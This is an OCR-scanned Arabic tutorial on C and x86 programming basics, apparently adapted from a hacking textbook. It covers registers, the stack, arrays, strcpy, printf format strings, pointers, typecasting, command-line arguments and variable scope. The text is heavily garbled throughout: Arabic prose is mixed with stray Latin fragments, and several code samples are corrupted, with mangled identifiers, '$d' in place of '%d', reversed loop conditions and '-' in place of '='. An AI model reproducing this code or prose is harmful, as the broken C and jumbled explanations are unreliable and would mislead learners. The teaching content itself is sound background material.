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مايل توضيح J AR‏ منّم: 


EAX 

يُطلّق عليها Accumulator register kal‏ تقوم بإجراء بعض العملیات الحسابية مثل el‏ والطرح و A UM‏ 
Lal,‏ الضرب والقسمّة. ge eo‏ اال مكان تخزین ال return values‏ 

*. return value هذا ال‎ Šis هل‎ 

لقد تحدثنا ace‏ في فقرة ال NE "Functions"‏ یمکننا التأكد من JESI‏ أداء k% function‏ عن طريق فحص T‏ 
ال |S EAX‏ يمكئنا معرفة القيمة الفعلية لهذا ال .return value‏ 


ECX 
-Looping operations تستخدم في ال‎ \:Y «Count register or Counter" بط علیها‎ 


EDX 
أثناء‎ data تدعمها في حالة تخزين كمية أكبر من ال‎ bz] أي‎ EAX امتداد لل‎ 355 5 «Data register عليها‎ (alla; هذه‎ 


el]‏ احسابات الاکثر تعقید!. 


EBX 
لوظيفة بعینها» لکنها تستخدم كمساحة إضافية للتخزين.‎ "S «Base register aloes 
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e‏ يظهر لنا نوعين جديدين من ال Registers‏ وهم: 
ESP and EBP‏ 
Stack Pointer‏ و Base Pointer‏ يتم استخدامهم لإدارة عملية ال function calls‏ والتعامل مع ال Stack‏ 


LE 


Empty Stack وتعتمد مبداً ال‎ «function calls 


سنتعرض لهم بمزيد من التفصيل في 
الباب الثالث. 


ولکن ماهذا ال Stack‏ ؟ Ww‏ 


This will be the 
first object to 


come out. بال‎ Seth Shes Sesh 


يبدو structure lel‏ يقوم بالاحتفاظ 


"First In Last Out" ويعنى‎ (FILO) 

كا يظهر بالشكل» ol‏ على عملية إرسال البيانات إليها “Push”‏ وعملية استخراج البيانات منها ب “Pop”‏ 
سأوضح لك function call ilas‏ بالأسفل لتشاهد e CAS‏ إرسال البّيانات إلى ال Stack‏ وبوجه عام.. تقوم ال 
Stack‏ بثلاثة أمور رئيسية هی - 


Stores information about how a function is called, the parameters it takes, and how it should 
return after it is finished executing. 


هذا مثال لِعَمَلية إجراء «function call‏ ستّری Gs‏ دور SS‏ من ال (ESP and EBP)‏ هذه هی ال اب یج 


:) بلغة ال‎ my. pencils( ) Sidi function JÛ call لعمل‎ 


int my pencils (color one, color two, color three); 
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:x86 Assembly بال‎ Call عملية ال‎ os وهكذا‎ 


push color three 
push color two 
push color one 
call my pencils 


وهذا هو شكل ال «Stack frame‏ (لاحظ أن ال Argument‏ الثالث تم وضعه à‏ أسفل ال «KStack‏ كا أنه Gl‏ 


(Top of Stack) إلى ال‎ ESP ال‎ guit ما‎ 


Return address 
color one 
color two 


Stack 


direction 
Base of stack frame 


والآن سنقوم باضافة سطر إلى هذه ال function‏ کی نشاهد ما diss‏ في ال Stack‏ 


int my pencils (color one, color two, color 3); 
{ 
char uni pen color one[10] 


) 
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(uni pen color one) pe سيكون ہا‎ «stack في ال‎ Return address ال‎ GE ظهور خانة آخر ی فوق‎ [HS 
."Top of Stack" إلى ال‎ teas يشير‎ ay للاشارة إليهاء‎ Stack pointer وسينتقل ال‎ 


سنكتفي ذا القدر حالياً. لنعود إلى ال Registers‏ الآخرى: 


ESI and EDI 


= (ESI) Source Index, holds the location of the input data stream. 
= (EDI) Destination Index, points to the location where the result of a data operation is 
stored. 


a Pd - (2^7 ^ 
ولتسهيل عملية التذكر:‎ 
= ESTis used when we need to read data from something. 
= EDI is used when we want to write data in somewhere. 


EIP 
NV: بقرائتها. كك‎ CPU الحالية التى یقوم ال‎ Instruction إلى ال‎ pee QÑ Instruction Pointer يُطلّق علیها‎ 


بشخص cx‏ إصبعه على کل AXIS‏ یقرآها أثناء قرائته لجلة أو موضوع L‏ كذلك ال 017 يستخدم إصبعه 
الخاص وهو ال aJ EIP‏ | کل Instruction‏ جري تفه هذه من ال registers‏ التی ستولیها اهت‌امك آثناء عملية ال 


.Debugging 


إلى هنا نکون قد آنهینا هذا الفاصل.. هيا لتعود من جديد لنستکول الأساسيات AZ AN‏ 
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Arrays 


.Memory محددة تتموضع داخل ال‎ data type من العناصر عددها  ذات‎ de poe Le] 
“Buffers” علیها‎ ae Lal “Ts a list of n elements of a specific data type” 


مايل مثال يوضح UJ‏ ال :character array‏ 


#include <stdio.h> 


int main() 


{ 
char str a[20]; 
str a[0] = 'H'; 
str a[1] = 'e'; 
str a[2] = fens 
str_a[3] = 'l'; 
str a[4] = 'o'; 
str a[5] LU Fr 
str a[6] = ۲ '; 
str a[7] = ۲۷۲۲ 
str a[8] = “On 
str a[9] = 'r'; 
str a[10] = 'l'; 
str a[11] = 'g'; 
str a[12] = 'I'; 
str a[13] SENDE 
str a[14] = 0; 
printf (str a); 


وهذا شكل البرنامج عند عمل compile‏ له باستخدام ‘GCC‏ 
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reader@hacking:~/booksre $ gcc -o char array char array.c 
reader@hacking:~/booksre $ ./char array 

Hello, world! 

reader@hacking:~/booksre $ 


ela 

لدينا ملاحظة بسيطة.. لقد قمنا بحجز buffer‏ مساحته تتسع ل 20 حرف أي أنه تم تخصيص bytes‏ 20 لنا. لكننا 
USL‏ فقط bytes)‏ 12( منهم!» أيضاً آخر حرف كان )0( ..طلق عليه “null byte”‏ و پستخلم لإخبار ال functions‏ 
التي تتعامل مع هذه ال ob array‏ تتوقف عن القراءة عند ظهور هذا ال null byte‏ ويتم إهمال باقي ال buffer‏ وكأنه 
غير موجود. 

ولكن هل SRE‏ بي أن أكتب کل حرف ذه الطريقة البائسّة عند 85 بإدخال "string‏ 

بالطبع JN‏ سنستخدم E Library‏ 0 وهي ستقوم لَنا ee‏ الأعيال» les‏ تضرب مثال: 
سوف JH cs‏ التي ids‏ ثم نطلب من أحد ال functions‏ التي حافت للتعامل مع ال strings‏ أو ال Arrays‏ 
بنسخ ما كتبناه ووضعه داخل ال 036d kes cbuffer‏ هذه ال function‏ الرائعة التي لا يستخدمها أحد BY Ute‏ 
بذلك يعَرّض برناجه هجوم ال Buffer overflow‏ بکل بساطة! ©.. Ley ..strepy() l‏ أنها تقوم بالنسخ 
كالتالي: strcpy (destination, source)‏ 


يقوم الكود gbil‏ بنسخ العبارة Hello, world!‏ إلى ال str a xo buffer‏ ثم طباعته. 


#include <stdio.h> 

#include <string.h> 

int main() 4 
char str a[20]; 
strcpy (str a, "Hello, world!in"); 
printf (str a); 
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Signed and Unsigned 


عندما نتحدث عن ال numerical values‏ فنحن نعني الأعداد التي يتم تخزينها 3( ال memory‏ بالنظام الثنائي» 
وهي إما أن تكون Signed‏ أي (موجبة أو سالبة)» أو Unsigned‏ أي (موجبة فقط). نقوم بتعريف هذا cll‏ كالتالي: 
«unsigned int”‏ انا RET tee‏ بالمساحة eral‏ لهذا ال Numerical variable‏ سواءً بالزيادة أو بالتقصان 
وذلك بإضافة short or long‏ قبله. 

توجد function‏ 3( لغة ال C‏ تسمى ) )512601 ..وظيفتها تحديد مساحة أي data type‏ نريده. I‏ هذه ال 


SUNT ol ell مساحة بعض‎ de كى نتعرّف‎ 0 


#include <stdio.h> 
int main() 4 
printf("The 'int' data type is\t\t $d bytes\n", 
sizeof(int)); 


printf ("The 'unsigned int' data type is\t $d bytes Mn", 
(unsigned int)); 

printf ("The 'short int' data type is\t $d bytes Wn", 
sizeof(short int)); 

printf("The 'long int' data type is\t 50 bytes\n", 
sizeof(long int)); 

printf ("The 'long long int' data type is $d bytes Wn", 
sizeof(long long int)); 

printf("The 'float' data type is\t $d bytes\n", 
sizeof(float)); 

printf("The 'char' data type is\t\t $d bytes\n", 


P e 


sizeof (char)); 


لاحظ معي آننا استخدمنا ( printf(‏ لتقوم بطباعة شيء ما على الشاشة: 
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لقد استخدمنا ما يسمى بال format specifier‏ وهي d‏ لتقوم بعملية العرض كا يلي: 


سيقوم هذا الكود بعرض مساحة ال data types‏ التي قمنا بادخاها له کا هو موضح. 


reader@hacking:~/booksre $ gcc datatype sizes.c 
reader@hacking:~/booksre $ ./a.out 

The 'int' data type is 4 bytes 
The 'unsigned int' data type is 4 bytes 
The 'short int' data type is 2 bytes 
The 'long int' data type is 4 bytes 
The 'long long int' data type is 8 bytes 
The 'float' data type is 4 bytes 
The 'char' data type is 1 bytes 
reader@hacking:~/booksre $ 


Pointers 


ol Ex‏ ال (EIP register)‏ هي عبارة عن pointer‏ يشير إلى ال current instruction‏ أثناء عمل البرنامج وذلك 
لاحتوائها على ال memory address‏ الخاص ol‏ ال instruction‏ 

أثناء es od!‏ ال memory‏ تحتاج باستمرار Leas‏ النسخ للبيانات التي يتم استخدامها بواسطة ال functions‏ 
duly‏ فليس من A Sl‏ تكرار نسخ البيانات داخل ال memory‏ لكل function‏ نستدعیهاء لأنه يتطلب حجز 
مساحة ال destination‏ (التي سيتم نسخ ال data‏ إليها) في ال memory‏ قبل البدء بعمَلية النسخ!. سَيَكون الأمر 
Ke‏ لل memory‏ ومستهلکا Vou JU‏ من ذلك يمكننا استخدام ال pointer‏ لنتحرك به É‏ حرية داخل ال 


„blocks عن طريق الإشارة إلى عناوين ال‎ memory 


We use pointers to point to the address of the beginning of that block of memory. 
Pointers are 32 bits in size (4 bytes), and is defining by putting (*) to the variable name. 
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Les‏ نأخذ مثال: 


#include <stdio.h> 
#include <string.h> 


int main() { 
char str a[20]; // A 20-element character array 
char *pointer; // ^ pointer, meant for a character array 
char *pointer2; // another one 
SErOpy(tsSbÉ B, "Hello, world!\n"); 
pointer - str a; // Set the first pointer to the start of the array. 


printf (pointer); 

pointer2 - pointer + 2; //Setthe second one 2 bytes further in. 
printf (pointer2); // Print it. 

strcpy(pointer2, "y you guys!\n"); //Copy into that spot. 
printf(pointer);  //Printagain 


مايل نتائج هذا الكود: 


reader@hacking:~/booksre $ gcc -o pointer pointer.c 
reader@hacking:~/booksre $ ./pointer 

Hello, world! 

llo, world! 

Hey you guys! 

reader@hacking:~/booksrce $ 
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A 


قمنا بنسخ “Hello, world!”‏ ووضعناها داخل pointer Was e «str a‏ يشير إليها بعد أن قمنا بتعريفه فوق على أنه 
que pointer2 Lle% = «““char pointer points to char array”‏ إلى (pointer + 2bytes)‏ بمعنى أنه سيقفز مقدار 
حرفين لیتجاهل 6 وعند استخدام ) printf(‏ لعرض هذا ال pointer2‏ سيظهر "llo, world!” UJ‏ ثم قمنا e‏ 


^ 


عباره BA‏ هي cy you guys!”‏ ووضعناها geh on‏ ال .pointer2‏ هذا يعني أله لتق تعدیل في هذه ال 
ob String‏ سيتم استبدال world!”‏ ,110“ بالعبارة "y you guys!"‏ 

Ç.. pointer2 هذا ال‎ quis ولكن‎ 

إنه يشير إلى بداية byte JI‏ الثالث في ال ."str. a"‏ تذكر أن pointer‏ يشير إلى بداية a"‏ 50۲" ونحن هنا تركنا أول 2 
bytes‏ بها دون تعدیل» وهم d “He”‏ نسخنا عبارة جدیدة!» ستبدأ من ال byte‏ الثالث في هذه ال character‏ 
P «array‏ طلبنا من ال ) 5e printf(‏ 2 ال array‏ التي يشير إليها هذا ال pointer‏ باستدعاؤه» فتكون النتيجة 
"Hey you guys!”‏ 

مُلاحَظَة صغيرة: 

memory الخاص به داخل ال‎ address ال‎ ol ولتفرض‎ «memory في مَكانٍ ما داخل ال‎ e ذاته‎ integer أن ال‎ Ks 
هذا ال 1 عندما نستدعيه باستخدام‎ dnt إلى هذ ال‎ p وجعلناه‎ pointer نم قمنا بتعريف‎ Oxbffff8a هو‎ 
طباعة هذا‎ sa Oxbffff8a بداخله» وهو‎ int الذي یقع هذا ال‎ memory عنوان ال‎ UJ سیعرض‎ printf( ( الدالة‎ 
بطريقة آخری!:‎ tal (the memory address of a variable) العنوان‎ 

باستخدام “the address-of operator”‏ یرمز له بعلامة (&). فعند استخدام &int‏ داخل ال ) b axe printf(‏ 


۵ آیضا!. 


Programming 
[43] 


والآن.. كيف سيكون ال return‏ عند استخدام )&( مع أحد المتغيرات؟؟: 


The address of that variable, instead of the variable itself . 


مايل مثال s‏ نقوم بطباعة ال Address‏ الخاص به بصيغة ال Hex‏ وباستخدام ال operator"‏ &“ 


int A = 7; 
printf("variable A is at address: %08x\n", &A); 


^-^ 


ولكن ماذا إن 5 Cx‏ هذا ال "&" 3[ ال *..pointer‏ 


بها أنه یقوم بعرض p 5 "2001655-01 "Jl‏ بعرّض ال NA; “Address-of that pointer"‏ من ال address‏ الذي 


يشير إليه هذا ال {pointer‏ 


هيا لنقوم بتفكيك هذا الإشكال في الثال التالي: 


GDB Debugger باستخدام‎ 4 debug d مايل كود تم‎ 


reader@hacking:~/booksre $ gcc -g addressof.c 
reader@hacking:~/booksre $ gdb -q ./a.out 
Using host libthread_db library 
"/lib/tls/i686/cmov/libthread_db.so.1". 


(gdb) 1 


بر نب نب در ال YO‏ 


#incl 


int 
int 
int 


int 


ist 


ude <stdio.h> 


main() { 
int var = 5; 
*int ptr; 

ptr = &int var; 


// Putthe address of int var intoint ptr. 
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8 } 
(gdb) break 8 


Breakpoint 1 at 0x8048361: file addressof.c, line 8. 
(gdb) run 

Starting program: /home/reader/booksrc/a.out 
Breakpoint 1, main () at addressof.c:8 

8 } 

هنا نطلب عرض قيمة أو محتوى المتغير (gdb) print int var‏ 

$1 = 5 


هُنا Udh‏ عرض عنوان ال block of memory‏ الذي يحمل هذا المتغير ولیس قيمته (gdb) print &int var‏ 
(int *) Oxbffff804‏ = $2 
هنا Udh‏ عرض مايّحويهِ هذا ال pointer‏ وهو (مكان المتغیر الذي يُشير (gdb) print int ptr (4d)‏ 
(int *) Oxbffff804‏ = $3 
وهنا طلبنا عرض مكان هذا ال pointer‏ في حد 433 داخل الميموري! (gdb) print &int ptr‏ 
(int **( 0‏ = $4 

(gdb) 


سنعاود الحديث عن ال pointers‏ في 33 à‏ ال Typecasting‏ .. 


Format Strings 
إدراج ال‎ scd على الشاشة» وهناك استخدامات أخرى‎ ots gle يتم استخدامها لطباعة‎ printf( ) کا نعلم أن‎ 


ai بصب‎ col adi بداخلها لتقوم بإظاهر تتائج‎ format strings 


"This function can use format strings to print variables in many different format" 


مايل بعض أشكاها. 
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Parameter Output Type 


Sd Decimal 

Su Unsigned decimal 

SR Hexadecimal 

SS String 

$n Number of bytes written 


أول ثلاثة في الحدول format parameters e^‏ تقوم بعرض ال REL eve rit a "data"‏ 
توجد آنواع c p‏ من ال format strings‏ يمكننا استخدامها لِعَرْض data‏ وال "address-of-data"‏ في نفس 
الوقت. في المثال AI‏ سنستخم ال ($s)‏ لطباعة ال string‏ حتی تصل إلى ال e «null character‏ نقوم باستخدام 


."address-of that string in the memory" لطباعة ال‎ (3x) ix. الم‎ 


Cal‏ سنستخدم ($08x)‏ مع ال "dereferencing operator"‏ وهو )&( لعرض qox address-of‏ نوعه integer‏ في 


آخر سطر ف الکود. 


ولکن ماذا تعنی الصيغة ($08x)‏ ؟. 


تعنی اطبع لي bytes‏ 8 بصيغة -hexadecimal‏ 


ولاذا وَضَعْنا صفر قبل الرقم 8 $.($08x)‏ 
سأخبرك عقب المثال التالي: 
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#include <stdio.h> 
int main() ( 


char string[10]; 

int A = -73; 

unsigned int B = 31337; 
strcpy(string, "sample"); 


// Example of printing with different format string 


printf("[A] Dec: $d, Hex: $x, Unsigned: %u\n", A, A, A); 
printf("[B] Dec: $d, Hex: $x, Unsigned: %u\n", B, B, B); 
printf("[field width on B] 3: '$3u', 10: '$10u', 'SO8u'\n" 


B, B, B); 
printf("[string] 55 Address %08x\n", string, string); 


// Example of unary address operator (dereferencing) and a 96x format string 
printf("variable A is at address: %08x\n", &A); 


) 


لنشاهد نتائج هذا الكود الرائع: 


reader@hacking:~/booksre $ gcc -o fmt strings fmt strings.c 
reader@hacking:~/booksre $ ./fmt strings 

[A] Dec: -73, Hex: ffffffb7, Unsigned: 4294967223 

[B] Dec: 31337, Hex: 7a69, Unsigned: 31337 


[field width on B] 3: '31337', 10: " 31337" ; ‘00031337’ 
[string] sample Address bffff870 
variable A is at address: bffff86c 


reader8ühacking:-/booksrc $ 


ماهذا الذي يحدث! ©.. 
أول نتائج كانت تحص عرّض المتغير ۸ بثلاث صيغ.. 
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م قمنا في السطر الثاني برض Lal Ball‏ بثّلاثة صیغ.. Unsigned of S35,‏ لا تَعْرض 3« سالبة!.. 
a 3‏ للسطر الثالث وهو ال :"field width on B"‏ 
هُنا عندما نکتب رقم ile‏ ال ا* فنحنْ نقصد تخصيص حد أدنى من المساحة للمخرجات» فمثلاً وضع 8311 
نقصد بها.. يجب ألا تقل مساحة المخرجات عن bytes‏ 3.. ولکن في حالتنا LA‏ نحن نمتلك bytes‏ 5.. إذاً سنقوم 
بعمل expand‏ للمساحة.. OY‏ الشرط حدد لنا الحد الأدنى فقط!.. Ro GIG SF‏ إظهار الناتج بحد أدنى في مساحة 


0 هنا سيقوم بملئ باقي الساحة ب spaces‏ ک| تلاحظ 31337 بأنه وضع نا حمس مسافات ثم LWA‏ أرقام!. 


في الطلب الثالث حددنا له ×08 بما أننا وضعنا رقم zero‏ قبل ال 8 فنحن تُريد padding Jos‏ بقیّم 0 ..فقط coll‏ 
باقى ال bytes‏ 8 بأصفار وذلك WY‏ تَعْرض القيمة بال Hex‏ !. فتكون cot I‏ کا تری: '00031337* 


لقد وضع نا ثلاثة أصفار i‏ ال ane‏ أرقام لتکتمل ال bytes‏ 8. 


توجد function‏ آخری تنتمی لعائلة ال Standard Input/Output functions‏ 5 أن 4525 عليهاء ‘Scanf( ( e!‏ 
printf( ( «5,‏ في الوظيفة إلا أنها تتعامل مع المدخلات [ee‏ تتعامل الأخرى مع الات من خصائصها أيضاً 
أنها تتعامل مع ال "address of variables"‏ عوضاً عن ال variables‏ ذاتهاء بمعنى أنك ستقوم بتتعريف pes‏ 


"&var" duis ستدخلة‎ scanf( ) عند رغبتك بإدخاله إلى‎ d M int var 


هيا لنشاهد مثال على ذلك: 
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#include <stdio.h> 
#include <string.h> 


int main() 


{ 


char message[10]; 
int count, 


ig 


strcpy(message, "Hello, world!"); 
printf("Repeat how many times? "); 
scanf ("%d", &count); 
for(i=0; i < count; i++) 

printf("$3d - s\n", i, message); 


Jl بل ستتعامل مع‎ "count" نفسه‎ ell ولكنها لن تتعامل مع‎ decimal value ستنتظر منا‎ 50321) ( ob ترى‎ |S 


. “address of count in memory” 


ولهذا قمنا declare [or‏ للمتغير count‏ فوق E:‏ أدخلناه إليها باستخدام ال "dereferencing operator"‏ 


Lal‏ عَرّفنا مُتغير آخر (1) كي يسمح لنا Jaa‏ تكرار لل string‏ بناء على عدد المرات التي سَنّقوم بتحدیدها بعد ظهور 


."Repeat how many times" الرسالة‎ 


مايل النتائج: 


reader@hacking:~/booksre $ gcc -o input input.c 


reader@hacking:~/booksrce $ 


Repeat 

0 - Hel] 
1 - Hell 
2 - Hel] 


how 
O, 


O, 
O, 


many times? 3 


worl 
worl 
worl 


Ld! 
Ld! 
Ld! 


./input 


Programming 
[49] 


reader@hacking:~/booksre 5 ./input 
Repeat how 


lo, 
P 
to. 
p 
i. 
lo. 
To, 
io 
lo. 
lo. 


0 - Hel 
1 - He] 
2 - Hel 
3 - Hel 
4 - Hel 
5 - Hel 
6 - Hel 
7 - He] 
8 - Hel 
9 - Hel 
10 - Hell 
11 - Hell 


O, 
O, 


many 


times? 12 


world! 
world! 
world! 
world! 
world! 
world! 
world! 
world! 
world! 
world! 


wor] 


ld! 


wor] 


ld! 


reader@hacking:~/booksrcec $ 


مهذا أظن أنه قد استقرت فى أذهاننا Cut‏ استخدام ال format strings‏ سننتقل الآن لفهوم جديد هو ال 


Typecasting 


.Typecasting 


هو عبارة عن طريقة X35‏ لتغيير ال data type‏ الخاص بمُتغير ماه بغض النظر عن نوعه أثناء تعریفنا egit ol)‏ ال 


compiler‏ أنة سيتعامل e‏ هذا sU. eel‏ على ال new type‏ ال له.. فقط ih‏ العملية. 


de ex تكون‎ 


(typecast data type) var 
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لنأخذ مثال: 


#include <stdio.h> 


int main() 4 
int a, b; 


float cy ds 


a = 13; 
b= 57 

eo اک‎ BF 
d 


// Divide using integers. 


(float) a / (float) b; // Divide integers typecast as floats 


printf ("[integers]\t a = 50 b = Sd\n", a, b); 


printf("[floats]Nt c = $fNt d = %f\n", c, d); 


النتائج: 


reader@hacking: 
reader@hacking: 
[integers] a = 
[floats] c= 
reader@hacking: 


~/booksre $ gcc typecasting.c 
~/booksre $ ./a.out 

13 b= 5 

2.000000 d= 2.600000 
~/booksre $ 


IS‏ ترى فان ناتج القسمة في حالة استخدام ال int‏ سيكون 2 فقطء والآن.. لو طلبنا ال mod‏ هل تعلم ماذا سیکون 


الناتج :5 


هناك pores Abo‏ ال Pointers‏ أثناء Jes‏ ال compiler‏ معه.. فإنه يحتاج أن تكون ال pointers‏ 3535 . فمثلاً: 


“An integer pointer should point to integer data, while a character pointer should only point to 


character data". 


وبصورة عامة.. يشغل ال integer‏ مساحة قدرها lay ۰4 bytes‏ يشغل ال char‏ مساحة byte‏ 1. 
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Size of an int is 4 bytes on most architectures, and the size of a char is 1 byte. 


LAT مثال‎ Ae 

ستلاحظ استخدام format parameter‏ جديد. . وهو ll» (Sp)‏ ال ) printf(‏ لعرض متویات ال pointer‏ هذا ال 
e‏ م هو لعرص ختو 

(p)‏ يُشبه ماما الصيغة (02%08x)‏ بمَعنى أننا ثرید عرض النتائج بال Hexadecimal‏ وهي الصيغة المناسبة عرض 


.memory address ال‎ 


#include <stdio.h> 
int main() 4 

int i; 

char char array[5] = ('a', 'b', 'c', 'd', 'e'j; 
int int array[5] = (l1, 2, 3, 4, 5]; 

char *char pointer; 

int *int pointer; 

e 

al: 


har pointer = char array; 
int pointer - int array; 
for(i=0; i < 5; i++) { // Iterate through the int array with the int. pointer. 
printf("[integer pointer] points to $p, which contains the integer 
Sd\n", int pointer, *int pointer); 
int pointer - int pointer + 1; 
} 
for(i=0; i > 5; i++) { // Iterate through the char array with the char. pointer. 
printf ("[char pointer] points to $p, which contains the char 
'Sc'\n", char pointer, “char pointer): 
char pointer = char pointer + 1; 


} 
} 


كما ترى فقد قمنا بتعریف $ Gye Oé‏ ال arrays‏ تحتويان على Lak‏ عَناصرء 65 JS two pointers L352‏ منهم يُشير إلى 


(char pointer - char array;)4 ijblllarray ال‎ 
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ثم قمنا بالدخول إلى دالة for‏ لنجعل ال pointer‏ يدور داخلها ley‏ من الرقم 1 حتى الرقم 5.. سيقوم بطباعة أمرين: 


الأول هو ال "address of that number in memory"‏ رق أن ال pointer‏ سَيْشِير إلى عنوان الر قم 


المطلوب داخل الميموري! وذلك بمجرد استدعاء لل pointer‏ كالتالي: 


printf("[integer pointer] points to $pMn", int pointer); 


والثان هو الرقم ذاته الذي يشير إليه ذلك ال «pointer‏ وذلك ببساطة Ob‏ نستدعی ال tai pointer‏ لكن 
سنضع قبله (*) وكأننا نقول له "أخرج لنا ما يحويه هذا ال block‏ الذي تشر إليه"!. 


وهاهی الصيغة: 


printf ("[integer pointer] points: to $din", *int pointer); 


لاحظ أنه بعد أن يبدأ ال pointer‏ بعرض ال e address‏ بعرض zz col ge‏ | إلى instruction‏ التالية داخل دالة 


for‏ وهى: 


int pointer = int pointer + 1; 


..2 الرقم‎ AE d Eom التالي داخل المصفوفة»‎ address شیر إلى ال‎ Jazz 


ع 
ای انه 


ia]‏ . گم e 55 byte‏ بقفزها؟.. 
وبعد زيادة قيمة ال pointer‏ سيزداد SII‏ ++ .کر العملية إلى أن صل إلى الرقم 5. ثم CBS‏ بعدها خارج 


الدالة!. d:‏ ننتقل إلى 44.25 43 ال 3S5 characters‏ ما شر bm‏ 
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نتائج الكود: 


reader@hacking:~/booksre $ gcc pointer types.c 
reader@hacking:~/booksre $ ./a.out 

[integer pointer] points to Oxbffff7f0, which contains the integer 
[integer pointer] points to Oxbffff7f4, which contains the integer 
[integer pointer] points to Oxbffff7f8, which contains the integer 
[integer pointer] points to Oxbffff7fc, which contains the integer 
[integer pointer] points to Oxbffff800, which contains the integer 
[char pointer] points to Oxbffff810, which contains the char ۳ 
[char pointer] points to Oxbffff811, which contains the char 'b' 
[char pointer] points to Oxbffff812, which contains the char 'c' 
[char pointer] points to Oxbffff813, which contains the char 'd' 
char pointer] points to Oxbffff814, which contains the char 'e' 
reader(ühacking:-/booksrc $ 


OP WN حم‎ 


] 
] 
] 
] 


لاحظ أن ال integer pointer‏ يزداد بمقدار Seed ."4 bytes"‏ انتقلنا من العدد 8 الى C SAI‏ وذلك بالمرور على 
الارقام: © LY lias «9, A, B,‏ نتعامل بنظام ال Hexadecimal‏ حيث آخر حرف متاح هو of‏ وبعدها oyu‏ إلى 
الصفرء كما J‏ في الانتقال من Oxbffff7fc‏ إلى -Oxbffff800‏ وني Ju‏ يزداد ال character pointer‏ بمقدار 


byte"‏ 1" کا يظهر. 


هذه الأسطر تُلخص لك مارد في المثال السابق: 


A char is 1 byte, an int is (typically) 4 bytes. When you increment a pointer, you increment by 
the size of the data being pointed to. So, when you increment a char*, you increment by 1 byte, 
and when you increment an int*, you increment 4 bytes. 
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Command Line Arguments 


نستخدم هذا النوع من المدخلات في حالة البرامج التي لا حتوي على GUI‏ حیث لا تحتاج إلى أي Interaction‏ في 
الغالب من قبل ال users‏ بعد أن يبدأ البرنامج بالعمل» فهي لا تستقبل ال inputs‏ عبر دالة ال ( scanf(‏ التقلیدیقف 
ولكن يمكنك إضافة ال arguments‏ التي تود أن يستقبلها البرنامج Ob‏ تقوم بكتابتها بعد إسم البرنامج» حيث يُعتبر 
إسم البرنامج ]0[ argument‏ ثم Gh‏ بعدها ما Altas‏ أنت. نستخدم هذا النوع من المدخلات بشكل ملحوظ في بيئة 
ال DOS‏ و .Linux Terminal‏ 

سنقوم بتعريف ال arguments‏ في ال ( WY main(‏ أول 0 يشير UI‏ ال EP‏ عند بداية عمل البرنامج» 
المهم.. سنقوم بإضافة integer‏ يُعتبر كعَدّاد لتحديد عدد ال ER Arguments‏ ادخاطا.. 


و 


«"pointer to an array of strings" e‏ هذه ال array‏ ستكون ال arguments‏ ذاتها. 
هذه هى صيغتها: 
int main(int argc, char *argv[])‏ 


و 


لنعطي مثال: 


#include <stdio.h> 
int main(int arg count, char *arg list[]) { 


int i; 
printf("There were 50 arguments provided:\n", arg count); 
for(i-0; i > arg count; 1++( 

printf ("argument #%d\t - \t%s\n", i, arg list[i]); 
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يبدو أننا 1 تُحَدّد عدد ال arguments‏ الطلوب إدخاها Mass‏ فسيستقبل متا هذا الكود أي عدد من ال 
Arguments‏ نقوم بإدخاله J‏ يقوم بطباعته LI‏ على الشاشة باستخدام دالة ( Cee printf(‏ تعرض ترتيب ال 
Fea argument‏ وال string‏ الا "m‏ 


مايل النتائج: 


reader@hacking:~/booksre $ gcc -o commandline commandline.c 
reader@hacking:~/booksre $ ./commandline 
There were 1 arguments provided: 


argument 40 - ./commandline 


A 


reader@hacking:~/booksre $ ./commandline this is a test 
There were 5 arguments provided: 


argument 40 - ./commandline 
argument #1 - this 

argument #2 - is 

argument 43 - a 

argument #4 - test 
reader@hacking:~/booksrce $ 


لاحظ أن اسم البرنامج في حد ذاته Ex‏ اول (S Argument‏ يَظهّر بالأعلى. e‏ قمنا بإدخال SOUS ie pt‏ 


ex Arguments‏ طباعتها. 


Variable Scoping 


سنتکلم OV‏ عن el gl‏ ال variables‏ من CS‏ طريقة تعريفها.. فهي اما “Local”‏ أو “Global”‏ یمکن لل 
functions‏ أن تمتلك المتغيرات الخاصة de‏ وهی المتغيرات التی يتم عمل declare‏ فا داخل ال aliis «function‏ 


"Local variables" عليها‎ 


Programming 
[56] 


ستأخذ مثال لتوضيح هذا النوع من ال variables‏ : 


#include <stdio.h> 


void func3() { 


int i 


= 11; 


printf("NtNtNt[in func3] i = Sd\n", i); 


) 


void 2 


int i 


printf(" 


func3 


() 1 
27; 

NENE [3m fune2J] TUS $dXn", 3); 
0; 


printf("NtNt[back in func2] i = $dMn", i); 


) 


void funcl 


int i 


printf(" 


func2 


O 1 
25; 
Nt[in funcl] i = $dWMn", i); 


0; 


printf("Nt[back in funcl] i = %d\n", i); 


0; 


f("[back in main] i = $dMn", i); 


سيدا البرنامج عند ال ) main(‏ ليقوم بطباعة ال رقم 3 e‏ تقوم ال ) call joa; main(‏ لل «funcl‏ هنا Xy‏ أن تنتهى 
ال funcl‏ من عملها کی يتسنى لل ) main(‏ استكمال تنفيذ ال instruction‏ الثالث!» ولكن بعد أن قامت ال funcl‏ 


بطباعة قيمة d‏ قامت call Joe‏ الى ال func?‏ تقوم بطباعة قيمة i‏ أيضاً. 
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لاحظ أن funcl‏ ستنتظر ال func2‏ إلى أن تنتهي من عملها كي تقوم باستكال تنفيذ السطر الثالث بهاء ومِنْ 3 يعود 
ال pointer‏ إلى ال ( .main(‏ لكن قامت Lai‏ 2 بعمل call‏ لل func3‏ في السطر الثاني.. 

بعد قيام func3‏ بطباعة قيمة i‏ توقفت!.. فعاد التسلسل بالترتيب کا صعد بالترتیب» حيث يعود ال pointer‏ إلى ال 
2 لتقوم بتنفيذ السطر الثالث.. ثم ينتقل إلى ال 1061 لِتّقوم بطباعة السطر الثالث لديها.. ثم ینتقل مرةً أخرى الى 
ال ( main(‏ لتقوم في النهاية بتنفيذ ال instruction‏ الاخيرة iX 1408 e tu‏ وهو 3» والآن يبدو آنك فهمت 


كيف ستکون النتائج!. 


لاحظ اختلاف قيمة i‏ من function‏ لأخرى aY‏ يتم تعریفها على هيئة local variable‏ لكل function‏ على حده!. 


al)‏ نظرة على النتائج: 


reader@hacking:~/booksre $ gcc scope.c 
reader@hacking:~/booksre 5 ./a.out 
[in main] i = 3 
[in funcl] i = 5 
[in func2] i = 7 
[in func3] i = 11 
[back in func2] i = 7 
[back in funcl] i = 5 
[back in main] i = 3 
reader@hacking:~/booksrce $ 
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dor 


لقد فهمنا ال ..“Local Variables"‏ هيا بنا لننتقل إلى ال fs ..“Global Variables"‏ ال Variable‏ من نوع 


functions إذاتم تعريفها في بداية الكود. خارج جميع ال‎ “global” 
تأمل هذا المثال:‎ 


